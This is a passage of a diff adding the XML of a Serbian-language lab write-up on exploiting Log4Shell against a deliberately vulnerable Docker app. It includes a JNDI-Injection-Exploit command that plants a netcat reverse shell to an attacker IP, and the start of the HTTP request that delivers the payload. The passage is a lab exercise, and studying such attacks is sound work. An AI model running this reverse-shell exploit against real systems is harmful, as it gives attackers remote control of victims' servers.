+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>serveru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>npr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> EC2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>instaci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>podi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LDAP server. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Postoje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>projekti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> za </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ovaj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>https://github.com/welk1n/JNDI-Injection-Exploit/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Sa </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>comandom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>povezujemo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>aplikacijom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc 54.243.12.192 8083 -e /bin/sh" -A "54.243.12.192"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ovaj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LDAP server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>hostuje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> URL koji </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>koristi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>vra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>maliciozan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>comandom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Nadad </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>vr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>iti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>nad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>applikacijom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>https://github.com/darryk10/log4shell-vulnerable-app</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>koja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sadr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>verziju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>biblioteka</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>koja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ranjiva</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ovaj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Aplikacija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>tr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dosker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> container-u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>portu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8080</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>aplikaciji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> koji je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sklon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napadu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0206A2EE" wp14:editId="1B0C407A">
+            <wp:extent cx="4869180" cy="4103835"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
+            <wp:docPr id="847654726" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="847654726" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId20"/>
+                    <a:srcRect l="22693" t="14815" r="30000" b="14302"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4871954" cy="4106173"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kako bi </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>treba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napravimo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> request payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>kroz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> URL koji host-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LDAP server. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Napad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>preko</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Cookie </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>atributa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>GET / HTTP/1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Host: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>:8080</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>sec-ch-ua-mobile: ?0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Upgrade-Insecure-Requests: 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>X-Api-Version: aaa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
